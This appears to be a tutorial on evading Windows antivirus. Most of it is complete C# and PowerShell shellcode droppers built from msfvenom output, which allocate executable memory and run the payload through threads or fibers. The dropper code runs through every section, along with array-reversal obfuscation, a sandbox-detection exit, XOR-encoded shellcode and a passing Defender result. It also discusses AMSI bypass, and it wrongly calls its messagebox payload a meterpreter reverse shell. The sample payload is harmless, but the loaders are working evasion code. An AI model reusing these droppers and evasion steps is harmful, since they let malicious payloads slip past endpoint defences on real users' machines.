Setup
In Visual Studio, create an empty C# project and name it "AV_Evasion". Create a C# class and name it "Dropper.cs".
AV Evasion with CSharp
Msfvenom Payload
On Kali, generate a vanilla meterpreter reverse shell payload with msfvenom:
Copy msfvenom -p windows/x64/messagebox -f exe -o msgbox64.exe
Upload msgbox64.exe
to VirusTotal :
This payload does not pass Windows Defender check.
Dropper
On Kali, generate MessageBox payload in C# format:
Copy msfvenom -p windows/x64/messagebox -f csharp
In Visual Studio, write a dropper in C#:
Copy using System ;
using System . Collections . Generic ;
using System . Linq ;
using System . Text ;
using System . Threading . Tasks ;
using System . Diagnostics ;
using System . Runtime . InteropServices ;
namespace AV_Evasion
{
class Dropper
{
[ DllImport ( "kernel32.dll" , SetLastError = true , ExactSpelling = true )]
static extern IntPtr VirtualAlloc ( IntPtr lpAddress , uint dwSize , uint
flAllocationType , uint flProtect);
[ DllImport ( "kernel32.dll" )]
static extern IntPtr CreateThread ( IntPtr lpThreadAttributes , uint dwStackSize ,
IntPtr lpStartAddress , IntPtr lpParameter , uint dwCreationFlags , IntPtr lpThreadId);
[ DllImport ( "kernel32.dll" )]
static extern UInt32 WaitForSingleObject ( IntPtr hHandle , UInt32 dwMilliseconds);
static void Main ( string [] args)
{
// msfvenom -p windows/x64/messagebox -f csharp
byte [] buf = new byte [ 295 ] {
0xfc , 0x48 , 0x81 , 0xe4 , 0xf0 , 0xff , 0xff , 0xff , 0xe8 , 0xd0 , 0x00 , 0x00 , 0x00 , 0x41 , 0x51 ,
0x41 , 0x50 , 0x52 , 0x51 , 0x56 , 0x48 , 0x31 , 0xd2 , 0x65 , 0x48 , 0x8b , 0x52 , 0x60 , 0x3e , 0x48 ,
0x8b , 0x52 , 0x18 , 0x3e , 0x48 , 0x8b , 0x52 , 0x20 , 0x3e , 0x48 , 0x8b , 0x72 , 0x50 , 0x3e , 0x48 ,
0x0f , 0xb7 , 0x4a , 0x4a , 0x4d , 0x31 , 0xc9 , 0x48 , 0x31 , 0xc0 , 0xac , 0x3c , 0x61 , 0x7c , 0x02 ,
0x2c , 0x20 , 0x41 , 0xc1 , 0xc9 , 0x0d , 0x41 , 0x01 , 0xc1 , 0xe2 , 0xed , 0x52 , 0x41 , 0x51 , 0x3e ,
0x48 , 0x8b , 0x52 , 0x20 , 0x3e , 0x8b , 0x42 , 0x3c , 0x48 , 0x01 , 0xd0 , 0x3e , 0x8b , 0x80 , 0x88 ,
0x00 , 0x00 , 0x00 , 0x48 , 0x85 , 0xc0 , 0x74 , 0x6f , 0x48 , 0x01 , 0xd0 , 0x50 , 0x3e , 0x8b , 0x48 ,
0x18 , 0x3e , 0x44 , 0x8b , 0x40 , 0x20 , 0x49 , 0x01 , 0xd0 , 0xe3 , 0x5c , 0x48 , 0xff , 0xc9 , 0x3e ,
0x41 , 0x8b , 0x34 , 0x88 , 0x48 , 0x01 , 0xd6 , 0x4d , 0x31 , 0xc9 , 0x48 , 0x31 , 0xc0 , 0xac , 0x41 ,
0xc1 , 0xc9 , 0x0d , 0x41 , 0x01 , 0xc1 , 0x38 , 0xe0 , 0x75 , 0xf1 , 0x3e , 0x4c , 0x03 , 0x4c , 0x24 ,
0x08 , 0x45 , 0x39 , 0xd1 , 0x75 , 0xd6 , 0x58 , 0x3e , 0x44 , 0x8b , 0x40 , 0x24 , 0x49 , 0x01 , 0xd0 ,
0x66 , 0x3e , 0x41 , 0x8b , 0x0c , 0x48 , 0x3e , 0x44 , 0x8b , 0x40 , 0x1c , 0x49 , 0x01 , 0xd0 , 0x3e ,
0x41 , 0x8b , 0x04 , 0x88 , 0x48 , 0x01 , 0xd0 , 0x41 , 0x58 , 0x41 , 0x58 , 0x5e , 0x59 , 0x5a , 0x41 ,
0x58 , 0x41 , 0x59 , 0x41 , 0x5a , 0x48 , 0x83 , 0xec , 0x20 , 0x41 , 0x52 , 0xff , 0xe0 , 0x58 , 0x41 ,
0x59 , 0x5a , 0x3e , 0x48 , 0x8b , 0x12 , 0xe9 , 0x49 , 0xff , 0xff , 0xff , 0x5d , 0x49 , 0xc7 , 0xc1 ,
0x00 , 0x00 , 0x00 , 0x00 , 0x3e , 0x48 , 0x8d , 0x95 , 0xfe , 0x00 , 0x00 , 0x00 , 0x3e , 0x4c , 0x8d ,
0x85 , 0x0f , 0x01 , 0x00 , 0x00 , 0x48 , 0x31 , 0xc9 , 0x41 , 0xba , 0x45 , 0x83 , 0x56 , 0x07 , 0xff ,
0xd5 , 0x48 , 0x31 , 0xc9 , 0x41 , 0xba , 0xf0 , 0xb5 , 0xa2 , 0x56 , 0xff , 0xd5 , 0x48 , 0x65 , 0x6c ,
0x6c , 0x6f , 0x2c , 0x20 , 0x66 , 0x72 , 0x6f , 0x6d , 0x20 , 0x4d , 0x53 , 0x46 , 0x21 , 0x00 , 0x4d ,
0x65 , 0x73 , 0x73 , 0x61 , 0x67 , 0x65 , 0x42 , 0x6f , 0x78 , 0x00 };
int size = buf . Length ;
IntPtr addr = VirtualAlloc ( IntPtr . Zero , 0x1000 , 0x3000 , 0x40 );
Marshal . Copy (buf , 0 , addr , size);
IntPtr hThread = CreateThread ( IntPtr . Zero , 0 , addr , IntPtr . Zero , 0 , IntPtr . Zero );
WaitForSingleObject (hThread , 0xFFFFFFFF );
}
}
}
Build it and upload the executable to VirusTotal:
This payload does not pass Windows Defender check.
"Double Reverse" Technique
We can obfuscate the payload with the "double reverse" technique: reverse the shellcode here and then call Array.Reverse()
.
Copy using System ;
using System . Collections . Generic ;
using System . Linq ;
using System . Text ;
using System . Threading . Tasks ;
using System . Diagnostics ;
using System . Runtime . InteropServices ;
namespace AV_Evasion
{
class Dropper
{
[ DllImport ( "kernel32.dll" , SetLastError = true , ExactSpelling = true )]
static extern IntPtr VirtualAlloc ( IntPtr lpAddress , uint dwSize , uint
flAllocationType , uint flProtect);
[ DllImport ( "kernel32.dll" )]
static extern IntPtr CreateThread ( IntPtr lpThreadAttributes , uint dwStackSize ,
IntPtr lpStartAddress , IntPtr lpParameter , uint dwCreationFlags , IntPtr lpThreadId);
[ DllImport ( "kernel32.dll" )]
static extern UInt32 WaitForSingleObject ( IntPtr hHandle , UInt32 dwMilliseconds);
static void Main ( string [] args)
{
// msfvenom -p windows/x64/messagebox -f csharp
byte [] waffle = new byte [ 295 ] {
0x00, 0x78, 0x6f, 0x42, 0x65, 0x67, 0x61, 0x73, 0x73, 0x65, 0x4d, 0x00, 0x21, 0x46, 0x53, 0x4d, 0x20, 0x6d, 0x6f, 0x72, 0x66, 0x20, 0x2c, 0x6f, 0x6c, 0x6c, 0x65, 0x48, 0xd5, 0xff, 0x56, 0xa2, 0xb5, 0xf0, 0xba, 0x41, 0xc9, 0x31, 0x48, 0xd5, 0xff, 0x07, 0x56, 0x83, 0x45, 0xba, 0x41, 0xc9, 0x31, 0x48, 0x00, 0x00, 0x01, 0x0f, 0x85, 0x8d, 0x4c, 0x3e, 0x00, 0x00, 0x00, 0xfe, 0x95, 0x8d, 0x48, 0x3e, 0x00, 0x00, 0x00, 0x00, 0xc1, 0xc7, 0x49, 0x5d, 0xff, 0xff, 0xff, 0x49, 0xe9, 0x12, 0x8b, 0x48, 0x3e, 0x5a, 0x59, 0x41, 0x58, 0xe0, 0xff, 0x52, 0x41, 0x20, 0xec, 0x83, 0x48, 0x5a, 0x41, 0x59, 0x41, 0x58, 0x41, 0x5a, 0x59, 0x5e, 0x58, 0x41, 0x58, 0x41, 0xd0, 0x01, 0x48, 0x88, 0x04, 0x8b, 0x41, 0x3e, 0xd0, 0x01, 0x49, 0x1c, 0x40, 0x8b, 0x44, 0x3e, 0x48, 0x0c, 0x8b, 0x41, 0x3e, 0x66, 0xd0, 0x01, 0x49, 0x24, 0x40, 0x8b, 0x44, 0x3e, 0x58, 0xd6, 0x75, 0xd1, 0x39, 0x45, 0x08, 0x24, 0x4c, 0x03, 0x4c, 0x3e, 0xf1, 0x75, 0xe0, 0x38, 0xc1, 0x01, 0x41, 0x0d, 0xc9, 0xc1, 0x41, 0xac, 0xc0, 0x31, 0x48, 0xc9, 0x31, 0x4d, 0xd6, 0x01, 0x48, 0x88, 0x34, 0x8b, 0x41, 0x3e, 0xc9, 0xff, 0x48, 0x5c, 0xe3, 0xd0, 0x01, 0x49, 0x20, 0x40, 0x8b, 0x44, 0x3e, 0x18, 0x48, 0x8b, 0x3e, 0x50, 0xd0, 0x01, 0x48, 0x6f, 0x74, 0xc0, 0x85, 0x48, 0x00, 0x00, 0x00, 0x88, 0x80, 0x8b, 0x3e, 0xd0, 0x01, 0x48, 0x3c, 0x42, 0x8b, 0x3e, 0x20, 0x52, 0x8b, 0x48, 0x3e, 0x51, 0x41, 0x52, 0xed, 0xe2, 0xc1, 0x01, 0x41, 0x0d, 0xc9, 0xc1, 0x41, 0x20, 0x2c, 0x02, 0x7c, 0x61, 0x3c, 0xac, 0xc0, 0x31, 0x48, 0xc9, 0x31, 0x4d, 0x4a, 0x4a, 0xb7, 0x0f, 0x48, 0x3e, 0x50, 0x72, 0x8b, 0x48, 0x3e, 0x20, 0x52, 0x8b, 0x48, 0x3e, 0x18, 0x52, 0x8b, 0x48, 0x3e, 0x60, 0x52, 0x8b, 0x48, 0x65, 0xd2, 0x31, 0x48, 0x56, 0x51, 0x52, 0x50, 0x41, 0x51, 0x41, 0x00, 0x00, 0x00, 0xd0, 0xe8, 0xff, 0xff, 0xff, 0xf0, 0xe4, 0x81, 0x48, 0xfc
};
Array . Reverse (waffle);
int size = waffle . Length ;
IntPtr addr = VirtualAlloc ( IntPtr . Zero , 0x1000 , 0x3000 , 0x40 );
Marshal . Copy (waffle , 0 , addr , size);
IntPtr hThread = CreateThread ( IntPtr . Zero , 0 , addr , IntPtr . Zero , 0 , IntPtr . Zero );
WaitForSingleObject (hThread , 0xFFFFFFFF );
}
}
}
Build it and upload the executable to VirusTotal:
This payload does not pass Windows Defender check.
Sandbox
Before you run a suspicious executable, AV will spawn a tiny virtual machine (aka sandbox) to execute the executable and see if it is malicious.
Most sandboxes will dynamically rename the payload. To determine whether we are inside a sandbox or not, we can use System.Diagnostics.Process.GetCurrentProcess()
to get process information during runtime. If the process name changes, then we are inside a sandbox. In such case, we should simply exit the program:
Copy using System ;
using System . Collections . Generic ;
using System . Linq ;
using System . Text ;
using System . Threading . Tasks ;
using System . Diagnostics ;
using System . Runtime . InteropServices ;
namespace AV_Evasion
{
class Dropper
{
[ DllImport ( "kernel32.dll" , SetLastError = true , ExactSpelling = true )]
static extern IntPtr VirtualAlloc ( IntPtr lpAddress , uint dwSize , uint
flAllocationType , uint flProtect);
[ DllImport ( "kernel32.dll" )]
static extern IntPtr CreateThread ( IntPtr lpThreadAttributes , uint dwStackSize ,
IntPtr lpStartAddress , IntPtr lpParameter , uint dwCreationFlags , IntPtr lpThreadId);
[ DllImport ( "kernel32.dll" )]
static extern UInt32 WaitForSingleObject ( IntPtr hHandle , UInt32 dwMilliseconds);
static void Main ( string [] args)
{
string proc = Process . GetCurrentProcess (). ProcessName ;
if (proc != "AV_Evasion_3.exe" )
{
Environment . Exit ( 0 );
}
// msfvenom -p windows/x64/messagebox -f csharp
byte [] waffle = new byte [ 295 ] {
0x00, 0x78, 0x6f, 0x42, 0x65, 0x67, 0x61, 0x73, 0x73, 0x65, 0x4d, 0x00, 0x21, 0x46, 0x53, 0x4d, 0x20, 0x6d, 0x6f, 0x72, 0x66, 0x20, 0x2c, 0x6f, 0x6c, 0x6c, 0x65, 0x48, 0xd5, 0xff, 0x56, 0xa2, 0xb5, 0xf0, 0xba, 0x41, 0xc9, 0x31, 0x48, 0xd5, 0xff, 0x07, 0x56, 0x83, 0x45, 0xba, 0x41, 0xc9, 0x31, 0x48, 0x00, 0x00, 0x01, 0x0f, 0x85, 0x8d, 0x4c, 0x3e, 0x00, 0x00, 0x00, 0xfe, 0x95, 0x8d, 0x48, 0x3e, 0x00, 0x00, 0x00, 0x00, 0xc1, 0xc7, 0x49, 0x5d, 0xff, 0xff, 0xff, 0x49, 0xe9, 0x12, 0x8b, 0x48, 0x3e, 0x5a, 0x59, 0x41, 0x58, 0xe0, 0xff, 0x52, 0x41, 0x20, 0xec, 0x83, 0x48, 0x5a, 0x41, 0x59, 0x41, 0x58, 0x41, 0x5a, 0x59, 0x5e, 0x58, 0x41, 0x58, 0x41, 0xd0, 0x01, 0x48, 0x88, 0x04, 0x8b, 0x41, 0x3e, 0xd0, 0x01, 0x49, 0x1c, 0x40, 0x8b, 0x44, 0x3e, 0x48, 0x0c, 0x8b, 0x41, 0x3e, 0x66, 0xd0, 0x01, 0x49, 0x24, 0x40, 0x8b, 0x44, 0x3e, 0x58, 0xd6, 0x75, 0xd1, 0x39, 0x45, 0x08, 0x24, 0x4c, 0x03, 0x4c, 0x3e, 0xf1, 0x75, 0xe0, 0x38, 0xc1, 0x01, 0x41, 0x0d, 0xc9, 0xc1, 0x41, 0xac, 0xc0, 0x31, 0x48, 0xc9, 0x31, 0x4d, 0xd6, 0x01, 0x48, 0x88, 0x34, 0x8b, 0x41, 0x3e, 0xc9, 0xff, 0x48, 0x5c, 0xe3, 0xd0, 0x01, 0x49, 0x20, 0x40, 0x8b, 0x44, 0x3e, 0x18, 0x48, 0x8b, 0x3e, 0x50, 0xd0, 0x01, 0x48, 0x6f, 0x74, 0xc0, 0x85, 0x48, 0x00, 0x00, 0x00, 0x88, 0x80, 0x8b, 0x3e, 0xd0, 0x01, 0x48, 0x3c, 0x42, 0x8b, 0x3e, 0x20, 0x52, 0x8b, 0x48, 0x3e, 0x51, 0x41, 0x52, 0xed, 0xe2, 0xc1, 0x01, 0x41, 0x0d, 0xc9, 0xc1, 0x41, 0x20, 0x2c, 0x02, 0x7c, 0x61, 0x3c, 0xac, 0xc0, 0x31, 0x48, 0xc9, 0x31, 0x4d, 0x4a, 0x4a, 0xb7, 0x0f, 0x48, 0x3e, 0x50, 0x72, 0x8b, 0x48, 0x3e, 0x20, 0x52, 0x8b, 0x48, 0x3e, 0x18, 0x52, 0x8b, 0x48, 0x3e, 0x60, 0x52, 0x8b, 0x48, 0x65, 0xd2, 0x31, 0x48, 0x56, 0x51, 0x52, 0x50, 0x41, 0x51, 0x41, 0x00, 0x00, 0x00, 0xd0, 0xe8, 0xff, 0xff, 0xff, 0xf0, 0xe4, 0x81, 0x48, 0xfc
};
Array . Reverse (waffle);
int size = waffle . Length ;
IntPtr addr = VirtualAlloc ( IntPtr . Zero , 0x1000 , 0x3000 , 0x40 );
Marshal . Copy (waffle , 0 , addr , size);
IntPtr hThread = CreateThread ( IntPtr . Zero , 0 , addr , IntPtr . Zero , 0 , IntPtr . Zero );
WaitForSingleObject (hThread , 0xFFFFFFFF );
}
}
}
Right click the solution "AV_Evasion", go to "Add Reference..." and add System
. Build it and upload the executable to VirusTotal:
This payload passes Windows Defender check.
AV Evasion with PowerShell
C# -> PowerShell
Generate MessageBox shellcode in PowerShell format with msfvenom:
Copy msfvenom -p windows/x64/messagebox -f ps1
Write a Dropper in PowerShell:
Copy $Kernel32 = @"
using System;
using System.Runtime.InteropServices;
public class Kernel32 {
[DllImport("kernel32.dll")]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", CharSet=CharSet.Ansi)]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll", SetLastError=true)]
static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@
Add-Type $Kernel32
[Byte[]] $buf = 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x3e,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x6f,0x48,0x1,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x3e,0x41,0x8b,0xc,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x3e,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,0x0,0x0,0x0,0x0,0x3e,0x48,0x8d,0x95,0xfe,0x0,0x0,0x0,0x3e,0x4c,0x8d,0x85,0xf,0x1,0x0,0x0,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x7,0xff,0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x0,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x0
$size = $buf.Length
[ IntPtr ]$addr = [ Kernel32 ]::VirtualAlloc( 0 , $size , 0x3000 , 0x40 )
[ System.Runtime.InteropServices.Marshal ]::Copy($buf , 0 , $addr , $size)
$thandle = [ Kernel32 ]::CreateThread( 0 , 0 , $addr , 0 , 0 , 0 )
[ kernel32 ]::WaitForSingleObject($thandle , [ uint32 ] "0xFFFFFFFF" )
This script is flagged by AMSI easily:
What is AMSI?
AMSI scans for malicious activity in memory.
https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product that's present on a machine. AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads.
AMSI is agnostic of antimalware vendor; it's designed to allow for the most common malware scanning and protection techniques provided by today's antimalware products that can be integrated into applications. It supports a calling structure allowing for file and memory or stream scanning, content source URL/IP reputation checks, and other techniques.
AMSI Bypass
At a high level, once PowerShell is invoked, amsi.dll is injected into the process and executed. AMSI_Scan_Buffer
is then used to scan for malicious activity. Because of the way AMSI is currently implemented, the namespace can also patch back into it. Matt Graber wrote the original AMSI bypass for patching the Scan Buffer function to all return clean here . This has been "fixed" by Microsoft by adding that as a known malicious signature. However, signature detection isn't very good and can be bypassed fairly easily. The site amsi.fail was setup to create AMSI bypasses. We can easily pull down a payload and get around AMSI to allow our script to run. We will need to keep trying payloads in PowerShell until one works as intended.
However, I have tried many payloads and all of them are blocked by the latest Win11. We will investigate more in the "AMSI Bypass" section.
AV Evasion with Fibers
What is Fiber?
A fiber is a thread inside of a thread.
https://docs.microsoft.com/en-us/windows/win32/procthread/fibers
A fibe is a unit of execution that must be manually scheduled by the application. Fibers run in the context of the threads that schedule them. Each thread can schedule multiple fibers. In general, fibers do not provide advantages over a well-designed multithreaded application. However, using fibers can make it easier to port applications that were designed to schedule their own threads.
Fibers give us an alternative way to execute shellcode on a host in a manner that AV is not used to scanning.
Thread -> Fiber
Generate encoded MessageBox payload with msfvenom:
Copy msfvenom -p windows/x64/messagebox -f csharp -e x64/xor_dynamic
Upadte Dropper.cs
:
Copy using System ;
using System . Collections . Generic ;
using System . Linq ;
using System . Text ;
using System . Threading . Tasks ;
using System . Diagnostics ;
using System . Runtime . InteropServices ;
namespace AV_Evasion
{
class Dropper
{
[ DllImport ( "kernel32.dll" , SetLastError = true , ExactSpelling = true )]
static extern IntPtr VirtualAlloc ( IntPtr lpAddress , uint dwSize , uint
flAllocationType , uint flProtect);
[ DllImport ( "kernel32.dll" )]
static extern IntPtr ConvertThreadToFiber ( IntPtr lpParameter);
[ DllImport ( "kernel32.dll" )]
static extern IntPtr CreateFiber ( uint dwStackSize ,
IntPtr lpStartAddress , IntPtr lpParameter);
[ DllImport ( "kernel32.dll" )]
extern static IntPtr SwitchToFiber ( IntPtr fiberAddress);
static void Main ( string [] args)
{
// msfvenom -p windows/x64/messagebox -f csharp -e x64/xor_dynamic
byte [] waffle = new byte [ 345 ] {
0x3b, 0xc8, 0x10, 0x68, 0x7f, 0x52, 0x75, 0x77, 0x71, 0x63, 0x63, 0x75, 0x5d, 0x10, 0x31, 0x56, 0x43, 0x5d, 0x30, 0x7d, 0x7f, 0x62, 0x76, 0x30, 0x3c, 0x7f, 0x7c, 0x7c, 0x75, 0x58, 0xc5, 0xef, 0x46, 0xb2, 0xa5, 0xe0, 0xaa, 0x51, 0xd9, 0x21, 0x58, 0xc5, 0xef, 0x17, 0x46, 0x93, 0x55, 0xaa, 0x51, 0xd9, 0x21, 0x58, 0x10, 0x10, 0x11, 0x1f, 0x95, 0x9d, 0x5c, 0x2e, 0x10, 0x10, 0x10, 0xee, 0x85, 0x9d, 0x58, 0x2e, 0x10, 0x10, 0x10, 0x10, 0xd1, 0xd7, 0x59, 0x4d, 0xef, 0xef, 0xef, 0x59, 0xf9, 0x02, 0x9b, 0x58, 0x2e, 0x4a, 0x49, 0x51, 0x48, 0xf0, 0xef, 0x42, 0x51, 0x30, 0xfc, 0x93, 0x58, 0x4a, 0x51, 0x49, 0x51, 0x48, 0x51, 0x4a, 0x49, 0x4e, 0x48, 0x51, 0x48, 0x51, 0xc0, 0x11, 0x58, 0x98, 0x14, 0x9b, 0x51, 0x2e, 0xc0, 0x11, 0x59, 0x0c, 0x50, 0x9b, 0x54, 0x2e, 0x58, 0x1c, 0x9b, 0x51, 0x2e, 0x76, 0xc0, 0x11, 0x59, 0x34, 0x50, 0x9b, 0x54, 0x2e, 0x48, 0xc6, 0x65, 0xc1, 0x29, 0x55, 0x18, 0x34, 0x5c, 0x13, 0x5c, 0x2e, 0xe1, 0x65, 0xf0, 0x28, 0xd1, 0x11, 0x51, 0x1d, 0xd9, 0xd1, 0x51, 0xbc, 0xd0, 0x21, 0x58, 0xd9, 0x21, 0x5d, 0xc6, 0x11, 0x58, 0x98, 0x24, 0x9b, 0x51, 0x2e, 0xd9, 0xef, 0x58, 0x4c, 0xf3, 0xc0, 0x11, 0x59, 0x30, 0x50, 0x9b, 0x54, 0x2e, 0x08, 0x58, 0x9b, 0x2e, 0x40, 0xc0, 0x11, 0x58, 0x7f, 0x64, 0xd0, 0x95, 0x58, 0x10, 0x10, 0x10, 0x98, 0x90, 0x9b, 0x2e, 0xc0, 0x11, 0x58, 0x2c, 0x52, 0x9b, 0x2e, 0x30, 0x42, 0x9b, 0x58, 0x2e, 0x41, 0x51, 0x42, 0xfd, 0xf2, 0xd1, 0x11, 0x51, 0x1d, 0xd9, 0xd1, 0x51, 0x30, 0x3c, 0x12, 0x6c, 0x71, 0x2c, 0xbc, 0xd0, 0x21, 0x58, 0xd9, 0x21, 0x5d, 0x5a, 0x5a, 0xa7, 0x1f, 0x58, 0x2e, 0x40, 0x62, 0x9b, 0x58, 0x2e, 0x30, 0x42, 0x9b, 0x58, 0x2e, 0x08, 0x42, 0x9b, 0x58, 0x2e, 0x70, 0x42, 0x9b, 0x58, 0x75, 0xc2, 0x21, 0x58, 0x46, 0x41, 0x42, 0x40, 0x51, 0x41, 0x51, 0x10, 0x10, 0x10, 0xc0, 0xf8, 0xef, 0xef, 0xef, 0xe0, 0xf4, 0x91, 0x58, 0xec, 0x3b, 0x10, 0xff, 0xff, 0xff, 0xd4, 0xe8, 0xe1, 0xff, 0xe6, 0xeb, 0xea, 0x75, 0x3b, 0x3e, 0x80, 0x07, 0x74, 0x3b, 0xc8, 0x3f, 0x81, 0x66, 0xc6, 0xff, 0x48, 0xc7, 0xff, 0x48, 0x07, 0x30, 0x06, 0x8a, 0x5e, 0x53, 0x59, 0x57, 0xfd, 0x75, 0xae, 0xfc, 0x3b, 0xb0, 0x5f, 0x53, 0x5b, 0x27, 0xeb
};
Array . Reverse (waffle);
int size = waffle . Length ;
var MasterFiber = ConvertThreadToFiber ( IntPtr . Zero );
IntPtr addr = VirtualAlloc ( IntPtr . Zero , 0x1000 , 0x3000 , 0x40 );
Marshal . Copy (waffle , 0 , addr , size);
IntPtr hFiber = CreateFiber ( 0 , addr , IntPtr . Zero );
SwitchToFiber (hFiber);
}
}
}
Build it and upload the executable to VirusTotal:
Reference